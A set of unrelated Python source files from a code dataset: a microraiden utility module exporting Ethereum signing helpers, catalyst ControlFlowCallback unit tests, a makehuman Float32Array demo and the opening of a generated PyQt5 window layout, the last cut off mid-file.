| path: microraiden/utils/__init__.py | repo: andrevmatos/microraiden | head: 2d51e78afaf3c0a8ddab87e59a5260c0064cdbdd | licenses: ["MIT"] |
| max_stars_count: 417 | stars events: 2017-09-19T19:06:23.000Z / 2021-11-28T05:39:23.000Z |
| max_issues_count: 259 | issues events: 2017-09-19T20:42:57.000Z / 2020-11-18T01:31:41.000Z |
| max_forks_count: 126 | forks events: 2017-09-19T17:11:39.000Z / 2020-12-17T17:05:27.000Z |
from .crypto import (
generate_privkey,
pubkey_to_addr,
privkey_to_addr,
addr_from_sig,
pack,
keccak256,
keccak256_hex,
sign,
sign_transaction,
eth_message_hash,
eth_sign,
eth_verify,
eth_sign_typed_data_message,
eth_sign_typed_data,
eth_sign_typed_data_message_eip,
eth_sign_typed_data_eip,
get_balance_message,
sign_balance_proof,
verify_balance_proof,
sign_close,
verify_closing_sig
)
from .contract import (
create_signed_transaction,
create_transaction,
create_signed_contract_transaction,
create_contract_transaction,
create_transaction_data,
get_logs,
get_event_blocking,
wait_for_transaction
)
from .private_key import (
check_permission_safety,
get_private_key
)
from .misc import (
get_function_kwargs,
pop_function_kwargs
)
# __all__ must list the export names as strings; the bare callables that were
# listed here would make "from microraiden.utils import *" raise a TypeError
# at import time.
__all__ = [
'generate_privkey',
'pubkey_to_addr',
'privkey_to_addr',
'addr_from_sig',
'pack',
'keccak256',
'keccak256_hex',
'sign',
'sign_transaction',
'eth_message_hash',
'eth_sign',
'eth_verify',
'eth_sign_typed_data_message',
'eth_sign_typed_data',
'eth_sign_typed_data_message_eip',
'eth_sign_typed_data_eip',
'get_balance_message',
'sign_balance_proof',
'verify_balance_proof',
'sign_close',
'verify_closing_sig',
'create_signed_transaction',
'create_transaction',
'create_signed_contract_transaction',
'create_contract_transaction',
'create_transaction_data',
'get_logs',
'get_event_blocking',
'wait_for_transaction',
'check_permission_safety',
'get_private_key',
'get_function_kwargs',
'pop_function_kwargs',
]
| avg_line_length: 19.738095 | max_line_length: 39 | alphanum_fraction: 0.735826 |
| [remaining qsc_* quality-signal columns for this row omitted] |
| hexsha: 727f8247ba57ff4fc9b3c023a24f2aeb907d48b2 | size: 88 | ext: py | lang: Python |
| path: cyder/cydns/cybind/tests/test_models.py | repo: ngokevin/chili | head: 36c354ac567471d5e36dccf9eea5096c6b02d4b9 | licenses: ["BSD-3-Clause"] |
| max_stars_count: 2 | stars events: 2019-03-16T00:47:09.000Z / 2022-03-04T14:39:08.000Z |
| max_issues_count: 1 | issues events: 2020-04-24T08:24:55.000Z / 2020-04-24T08:24:55.000Z |
| forks count and dates: null |
from cydns.cybind.tests.dirty_soa import *
from cydns.cybind.tests.build_tests import *
| avg_line_length: 29.333333 | max_line_length: 44 | alphanum_fraction: 0.818182 |
| [remaining qsc_* quality-signal columns for this row omitted] |
| hexsha: 72cf11ddf0511d385dbdb76498f89badee9fe097 | size: 17,566 | ext: py | lang: Python |
| path: tests/catalyst/callbacks/test_control_flow.py | repo: gr33n-made/catalyst | head: bd413abc908ef7cbdeab42b0e805277a791e3ddb | licenses: ["Apache-2.0"] |
| max_stars_count: 1 | stars events: 2021-03-02T12:06:32.000Z / 2021-03-02T12:06:32.000Z |
| issues count and dates: null |
| max_forks_count: 1 | forks events: 2021-06-11T16:33:30.000Z / 2021-06-11T16:33:30.000Z |
# flake8: noqa
import random
import unittest
from unittest.mock import Mock
from catalyst.dl import Callback, CallbackOrder, ControlFlowCallback
class _Runner:
def __init__(self, stage, loader_key, global_epoch, epoch):
self.stage_key = stage
self.loader_key = loader_key
self.global_epoch_step = global_epoch
self.stage_epoch_step = epoch
class DummyCallback(Callback):
def __init__(self):
super().__init__(CallbackOrder.Internal)
class Dummy(Exception):
pass
def _raise(runner: "IRunner"):
raise Dummy()
class RaiserCallback(Callback):
def __init__(self, order, method_to_raise: str):
super().__init__(order)
setattr(self, method_to_raise, _raise)
def test_controll_flow_callback_filter_fn_periodical_epochs():
wraped = ControlFlowCallback(DummyCallback(), epochs=3)
mask = [i % 3 == 0 for i in range(1, 10 + 1)]
expected = {
"train": mask,
"valid": mask,
"another_loader": mask,
"like_valid": mask,
}
actual = {loader: [] for loader in expected.keys()}
for epoch in range(1, 10 + 1):
for loader in expected.keys():
runner = _Runner("stage", loader, epoch, epoch)
wraped.on_loader_start(runner)
actual[loader].append(wraped._is_enabled)
assert actual == expected
def test_controll_flow_callback_filter_fn_periodical_ignore_epochs():
wraped = ControlFlowCallback(DummyCallback(), ignore_epochs=4)
mask = [i % 4 != 0 for i in range(1, 10 + 1)]
expected = {
"train": mask,
"valid": mask,
"another_loader": mask,
"like_valid": mask,
}
actual = {loader: [] for loader in expected.keys()}
for epoch in range(1, 10 + 1):
for loader in expected.keys():
runner = _Runner("stage", loader, epoch, epoch)
wraped.on_loader_start(runner)
actual[loader].append(wraped._is_enabled)
assert actual == expected
def test_controll_flow_callback_filter_fn_epochs():
wraped = ControlFlowCallback(DummyCallback(), epochs=[3, 4, 6])
mask = [
False,
False,
True,
True,
False,
True,
False,
False,
False,
False,
]
expected = {
"train": mask,
"valid": mask,
}
actual = {loader: [] for loader in expected.keys()}
for epoch in range(1, 10 + 1):
for loader in expected.keys():
runner = _Runner("stage", loader, epoch, epoch)
wraped.on_loader_start(runner)
actual[loader].append(wraped._is_enabled)
assert actual == expected
def test_controll_flow_callback_filter_fn_global_epochs():
wraped = ControlFlowCallback(DummyCallback(), epochs=[3, 4, 7, 10], use_global_epochs=True)
mask = [
False,
False,
True,
True,
False,
False,
True,
False,
False,
True,
]
expected = {
"train": mask,
"valid": mask,
}
actual = {loader: [] for loader in expected.keys()}
for stage_num, stage in enumerate(["stage1", "stage2"]):
for epoch in range(1, 5 + 1):
for loader in expected.keys():
runner = _Runner(stage, loader, epoch + stage_num * 5, epoch)
wraped.on_loader_start(runner)
actual[loader].append(wraped._is_enabled)
assert actual == expected
def test_controll_flow_callback_filter_fn_ignore_epochs():
wraped = ControlFlowCallback(DummyCallback(), ignore_epochs=[3, 4, 6, 8])
mask = [
True,
True,
False,
False,
True,
False,
True,
False,
True,
True,
]
expected = {
"train": mask,
"valid": mask,
}
actual = {loader: [] for loader in expected.keys()}
for epoch in range(1, 10 + 1):
for loader in expected.keys():
runner = _Runner("stage", loader, epoch, epoch)
wraped.on_loader_start(runner)
actual[loader].append(wraped._is_enabled)
assert actual == expected
def test_controll_flow_callback_filter_fn_global_ignore_epochs():
wraped = ControlFlowCallback(
DummyCallback(), ignore_epochs=[3, 4, 7, 10], use_global_epochs=True
)
mask = [
True,
True,
False,
False,
True,
True,
False,
True,
True,
False,
]
expected = {
"train": mask,
"valid": mask,
}
actual = {loader: [] for loader in expected.keys()}
for stage_num, stage in enumerate(["stage1", "stage2"]):
for epoch in range(1, 5 + 1):
for loader in expected.keys():
runner = _Runner(stage, loader, epoch + stage_num * 5, epoch)
wraped.on_loader_start(runner)
actual[loader].append(wraped._is_enabled)
assert actual == expected
def test_control_flow_callback_filter_fn_loaders():
wraped = ControlFlowCallback(DummyCallback(), loaders=["valid"])
expected = {
"train": [False] * 5,
"valid": [True] * 5,
"another_loader": [False] * 5,
"like_valid": [False] * 5,
}
actual = {loader: [] for loader in expected.keys()}
for epoch in range(1, 5 + 1):
for loader in expected.keys():
runner = _Runner("stage", loader, epoch, epoch)
wraped.on_loader_start(runner)
actual[loader].append(wraped._is_enabled)
assert actual == expected
def test_control_flow_callback_filter_fn_ignore_loaders():
wraped = ControlFlowCallback(DummyCallback(), ignore_loaders=["valid", "another_loader"])
expected = {
"train": [True] * 5,
"valid": [False] * 5,
"another_loader": [False] * 5,
"like_valid": [True] * 5,
}
actual = {loader: [] for loader in expected.keys()}
for epoch in range(1, 5 + 1):
for loader in expected.keys():
runner = _Runner("stage", loader, epoch, epoch)
wraped.on_loader_start(runner)
actual[loader].append(wraped._is_enabled)
assert actual == expected
def test_control_flow_callback_filter_fn_multiple_epochs_loaders():
wraped = ControlFlowCallback(DummyCallback(), loaders={"valid": 3, "another_loader": [2, 4]})
expected = {
"train": [False] * 5,
"valid": [False, False, True, False, False],
"another_loader": [False, True, False, True, False],
"like_valid": [False] * 5,
}
actual = {loader: [] for loader in expected.keys()}
for epoch in range(1, 5 + 1):
for loader in expected.keys():
runner = _Runner("stage", loader, epoch, epoch)
wraped.on_loader_start(runner)
actual[loader].append(wraped._is_enabled)
assert actual == expected
def test_control_flow_callback_filter_fn_multiple_epochs_ignore_loaders():
wraped = ControlFlowCallback(
DummyCallback(), ignore_loaders={"valid": 3, "another_loader": [2, 4]}
)
expected = {
"train": [True] * 5,
"valid": [True, True, False, True, True],
"another_loader": [True, False, True, False, True],
"like_valid": [True] * 5,
}
actual = {loader: [] for loader in expected.keys()}
for epoch in range(1, 5 + 1):
for loader in expected.keys():
runner = _Runner("stage", loader, epoch, epoch)
wraped.on_loader_start(runner)
actual[loader].append(wraped._is_enabled)
assert actual == expected
def test_control_flow_callback_filter_fn_string_lambda():
wraped = ControlFlowCallback(
DummyCallback(), filter_fn="lambda stage, epoch, loader: 'valid' in loader",
)
expected = {
"train": [False] * 5,
"valid": [True] * 5,
"another_loader": [False] * 5,
"like_valid": [True] * 5,
}
actual = {loader: [] for loader in expected.keys()}
for epoch in range(1, 5 + 1):
for loader in expected.keys():
runner = _Runner("stage", loader, epoch, epoch)
wraped.on_loader_start(runner)
actual[loader].append(wraped._is_enabled)
assert actual == expected
def test_control_flow_callback_filter_fn_lambda():
wraped = ControlFlowCallback(
DummyCallback(), filter_fn=lambda stage, epoch, loader: "valid" not in loader,
)
expected = {
"train": [True] * 5,
"valid": [False] * 5,
"another_loader": [True] * 5,
"like_valid": [False] * 5,
}
actual = {loader: [] for loader in expected.keys()}
for epoch in range(1, 5 + 1):
for loader in expected.keys():
runner = _Runner("stage", loader, epoch, epoch)
wraped.on_loader_start(runner)
actual[loader].append(wraped._is_enabled)
assert actual == expected
class TestControlFlowCallback(unittest.TestCase):
def test_with_missing_args(self):
orders = (
CallbackOrder.Internal,
CallbackOrder.Metric,
CallbackOrder.MetricAggregation,
CallbackOrder.Optimizer,
CallbackOrder.Scheduler,
CallbackOrder.External,
)
for order in orders:
callback = RaiserCallback(order, "on_epoch_start")
with self.assertRaises(ValueError):
ControlFlowCallback(callback)
def test_epochs_with_wrong_args(self):
orders = (
CallbackOrder.Internal,
CallbackOrder.Metric,
CallbackOrder.MetricAggregation,
CallbackOrder.Optimizer,
CallbackOrder.Scheduler,
CallbackOrder.External,
)
order = random.choice(orders)
callback = RaiserCallback(order, "on_epoch_start")
with self.assertRaises(ValueError):
ControlFlowCallback(callback, epochs=None)
with self.assertRaises(ValueError):
ControlFlowCallback(callback, epochs="123456")
def test_ignore_epochs_with_wrong_args(self):
orders = (
CallbackOrder.Internal,
CallbackOrder.Metric,
CallbackOrder.MetricAggregation,
CallbackOrder.Optimizer,
CallbackOrder.Scheduler,
CallbackOrder.External,
)
order = random.choice(orders)
callback = RaiserCallback(order, "on_epoch_start")
with self.assertRaises(ValueError):
ControlFlowCallback(callback, ignore_epochs=None)
with self.assertRaises(ValueError):
ControlFlowCallback(callback, ignore_epochs="123456")
def test_loaders_with_wrong_args(self):
orders = (
CallbackOrder.Internal,
CallbackOrder.Metric,
CallbackOrder.MetricAggregation,
CallbackOrder.Optimizer,
CallbackOrder.Scheduler,
CallbackOrder.External,
)
order = random.choice(orders)
callback = RaiserCallback(order, "on_epoch_start")
with self.assertRaises(ValueError):
ControlFlowCallback(callback, loaders=1234.56)
with self.assertRaises(ValueError):
ControlFlowCallback(callback, loaders=1234.56)
with self.assertRaises(ValueError):
ControlFlowCallback(callback, loaders={"train": ["", "fjdskjfdk", "1234"]})
def test_ignore_loaders_with_wrong_args(self):
orders = (
CallbackOrder.Internal,
CallbackOrder.Metric,
CallbackOrder.MetricAggregation,
CallbackOrder.Optimizer,
CallbackOrder.Scheduler,
CallbackOrder.External,
)
order = random.choice(orders)
callback = RaiserCallback(order, "on_epoch_start")
with self.assertRaises(ValueError):
ControlFlowCallback(callback, ignore_loaders=1234.56)
with self.assertRaises(ValueError):
ControlFlowCallback(callback, ignore_loaders=1234.56)
with self.assertRaises(ValueError):
ControlFlowCallback(callback, ignore_loaders={"train": ["", "fjdskjfdk", "1234"]})
def test_ignore_foo_with_wrong_args(self):
orders = (
CallbackOrder.Internal,
CallbackOrder.Metric,
CallbackOrder.MetricAggregation,
CallbackOrder.Optimizer,
CallbackOrder.Scheduler,
CallbackOrder.External,
)
order = random.choice(orders)
callback = RaiserCallback(order, "on_epoch_start")
with self.assertRaises(ValueError):
ControlFlowCallback(callback, filter_fn=12345)
with self.assertRaises(ValueError):
ControlFlowCallback(callback, filter_fn=lambda arg: True)
with self.assertRaises(ValueError):
ControlFlowCallback(callback, filter_fn=lambda *args: True)
with self.assertRaises(ValueError):
ControlFlowCallback(callback, filter_fn=lambda one, two, three, four: True)
with self.assertRaises(ValueError):
ControlFlowCallback(callback, filter_fn=lambda *args, **kwargs: True)
def test_filter_fn_with_wrong_args(self):
runner = Mock(stage="stage1", loader_key="train", epoch=1)
orders = (
CallbackOrder.Internal,
CallbackOrder.Metric,
CallbackOrder.MetricAggregation,
CallbackOrder.Optimizer,
CallbackOrder.Scheduler,
CallbackOrder.External,
)
def _ignore_foo(stage: str, epoch: int, loader: str) -> bool:
return False
def _raise_foo(stage: str, epoch: int, loader: str) -> bool:
return True
for order in orders:
callback = RaiserCallback(order, "on_loader_start")
wrapper = ControlFlowCallback(callback, filter_fn=_ignore_foo)
wrapper.on_loader_start(runner)
callback = RaiserCallback(order, "on_loader_start")
wrapper = ControlFlowCallback(callback, filter_fn=_raise_foo)
with self.assertRaises(Dummy):
wrapper.on_loader_start(runner)
events = (
"on_loader_end",
"on_stage_start",
"on_stage_end",
"on_epoch_start",
"on_epoch_end",
"on_batch_start",
"on_batch_end",
"on_exception",
)
for event in events:
for order in orders:
callback = RaiserCallback(order, event)
wrapper = ControlFlowCallback(callback, filter_fn=_ignore_foo)
wrapper.on_loader_start(runner)
wrapper.__getattribute__(event)(runner)
callback = RaiserCallback(order, event)
wrapper = ControlFlowCallback(callback, filter_fn=_raise_foo)
wrapper.on_loader_start(runner)
with self.assertRaises(Dummy):
wrapper.__getattribute__(event)(runner)
def test_filter_fn_with_eval(self):
runner = Mock(stage="stage1", loader_key="train", epoch=1)
orders = (
CallbackOrder.Internal,
CallbackOrder.Metric,
CallbackOrder.MetricAggregation,
CallbackOrder.Optimizer,
CallbackOrder.Scheduler,
CallbackOrder.External,
)
for order in orders:
callback = RaiserCallback(order, "on_loader_start")
wrapper = ControlFlowCallback(callback, filter_fn="lambda s, e, l: False")
wrapper.on_loader_start(runner)
callback = RaiserCallback(order, "on_loader_start")
wrapper = ControlFlowCallback(callback, filter_fn="lambda s, e, l: True")
with self.assertRaises(Dummy):
wrapper.on_loader_start(runner)
events = (
"on_loader_end",
"on_stage_start",
"on_stage_end",
"on_epoch_start",
"on_epoch_end",
"on_batch_start",
"on_batch_end",
"on_exception",
)
for event in events:
for order in orders:
callback = RaiserCallback(order, event)
wrapper = ControlFlowCallback(callback, filter_fn="lambda s, e, l: False")
wrapper.on_loader_start(runner)
wrapper.__getattribute__(event)(runner)
callback = RaiserCallback(order, event)
wrapper = ControlFlowCallback(callback, filter_fn="lambda s, e, l: True")
wrapper.on_loader_start(runner)
with self.assertRaises(Dummy):
wrapper.__getattribute__(event)(runner)
def test_filter_fn_with_err_in_eval(self):
orders = (
CallbackOrder.Internal,
CallbackOrder.Metric,
CallbackOrder.MetricAggregation,
CallbackOrder.Optimizer,
CallbackOrder.Scheduler,
CallbackOrder.External,
)
events = (
"on_loader_start",
"on_loader_end",
"on_stage_start",
"on_stage_end",
"on_epoch_start",
"on_epoch_end",
"on_batch_start",
"on_batch_end",
"on_exception",
)
for event in events:
for order in orders:
callback = RaiserCallback(order, event)
with self.assertRaises(ValueError):
ControlFlowCallback(callback, filter_fn="lambda s, e, l")
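# Allow running the unittest-style cases directly; the module-level test_*
# functions above are assumed to be collected by pytest.
if __name__ == "__main__":
    unittest.main()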
| avg_line_length: 32.231193 | max_line_length: 97 | alphanum_fraction: 0.597063 |
| [remaining qsc_* quality-signal columns for this row omitted] |
| hexsha: 72d560b8d1aa6b09fdbd7f42d7dc09a307b6d315 | size: 1,746 | ext: py | lang: Python |
| max_stars path/repo: utils/unit/arraybuffer_unit.py @ teddydragoone/makehuman1.0.0alpha7 | head: 9aa7735a0a1ea83e52b1acc0fb8760057dd72d99 | licenses: ["CC0-1.0"] |
| max_stars_count: 2 | stars events: 2016-11-23T16:37:15.000Z / 2018-02-13T04:18:23.000Z |
| max_issues/max_forks path/repo: utils/unit/arraybuffer_unit.py @ Tomoyon/makehuman1.0.0alpha7 | head: 9aa7735a0a1ea83e52b1acc0fb8760057dd72d99 | licenses: ["CC0-1.0"] | counts/dates: null |
from mh import ArrayBuffer, Float32Array
# build from number
f32 = Float32Array(4)
print(f32, f32.byteOffset, f32.byteLength, f32.length, [f for f in f32])
# build from view
f32 = Float32Array(Float32Array((1.0, 2.0, 3.0, 4.0)))
print(f32, f32.byteOffset, f32.byteLength, f32.length, [f for f in f32])
# build from buffer
f32 = Float32Array(Float32Array((1.0, 2.0, 3.0, 4.0)).buffer)
print(f32, f32.byteOffset, f32.byteLength, f32.length, [f for f in f32])
# build from buffer with offset
f32 = Float32Array(Float32Array((1.0, 2.0, 3.0, 4.0)).buffer, 4)
print(f32, f32.byteOffset, f32.byteLength, f32.length, [f for f in f32])
# build from buffer with offset and length
f32 = Float32Array(Float32Array((1.0, 2.0, 3.0, 4.0)).buffer, 4, 8)
print(f32, f32.byteOffset, f32.byteLength, f32.length, [f for f in f32])
# build from sequence
f32 = Float32Array((1.0, 2.0, 3.0, 4.0))
print(f32, f32.byteOffset, f32.byteLength, f32.length, [f for f in f32])
# item
print(f32[0], f32[1], f32[2], f32[3])
# assign item
f32[1] = 5.0
print(f32, f32.byteOffset, f32.byteLength, f32.length, [f for f in f32])
# slice
f32 = Float32Array((1.0, 2.0, 3.0, 4.0))[:2]
print(f32, f32.byteOffset, f32.byteLength, f32.length, [f for f in f32])
f32 = Float32Array((1.0, 2.0, 3.0, 4.0))[2:]
print(f32, f32.byteOffset, f32.byteLength, f32.length, [f for f in f32])
# assign slice from view
f32 = Float32Array((1.0, 2.0, 3.0, 4.0))
f32[1:3] = Float32Array((5.0, 6.0))
print(f32, f32.byteOffset, f32.byteLength, f32.length, [f for f in f32])
# assign slice from sequence
f32 = Float32Array((1.0, 2.0, 3.0, 4.0))
f32[1:3] = (5.0, 6.0)
print(f32, f32.byteOffset, f32.byteLength, f32.length, [f for f in f32])
| avg_line_length: 29.1 | max_line_length: 72 | alphanum_fraction: 0.658076 |
| [remaining qsc_* quality-signal columns for this row omitted] |
| hexsha: f44b574fa80a7c4a7d37cc583d547cc233284769 | size: 94,202 | ext: py | lang: Python |
| path: main_window_ui.py | repo: junglefive/BleProduceTestHelper | head: aa8bcdb9f3b53b10ceb68cc4624e72703f006dff | licenses: ["MIT"] |
| stars/issues/forks counts and event dates: null |
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'main_window.ui'
#
# Created by: PyQt5 UI code generator 5.9
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
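# A sketch, not generated output: every palette entry in the generated code
# below repeats one brush pattern; a hand-written equivalent could factor it
# as follows. The helper name is hypothetical and unused by the generated code.
def _set_palette_color(palette, group, role, rgb):
    """Install a solid-color brush for one (group, role) palette slot."""
    brush = QtGui.QBrush(QtGui.QColor(*rgb))
    brush.setStyle(QtCore.Qt.SolidPattern)
    palette.setBrush(group, role, brush)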
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.setEnabled(True)
MainWindow.resize(632, 1250)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(MainWindow.sizePolicy().hasHeightForWidth())
MainWindow.setSizePolicy(sizePolicy)
MainWindow.setMinimumSize(QtCore.QSize(485, 759))
MainWindow.setMaximumSize(QtCore.QSize(16777215, 16777215))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 236, 233))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(247, 245, 244))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(120, 118, 116))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(160, 157, 155))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 236, 233))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(247, 245, 244))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 236, 233))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(247, 245, 244))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(120, 118, 116))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(160, 157, 155))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 236, 233))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(247, 245, 244))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipText, brush)
brush = QtGui.QBrush(QtGui.QColor(120, 118, 116))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 236, 233))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(247, 245, 244))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(120, 118, 116))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(160, 157, 155))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(120, 118, 116))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(120, 118, 116))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 236, 233))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 236, 233))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 236, 233))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ToolTipText, brush)
MainWindow.setPalette(palette)
MainWindow.setTabletTracking(False)
MainWindow.setLayoutDirection(QtCore.Qt.LeftToRight)
self.centralwidget = QtWidgets.QWidget(MainWindow)
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Light, brush)
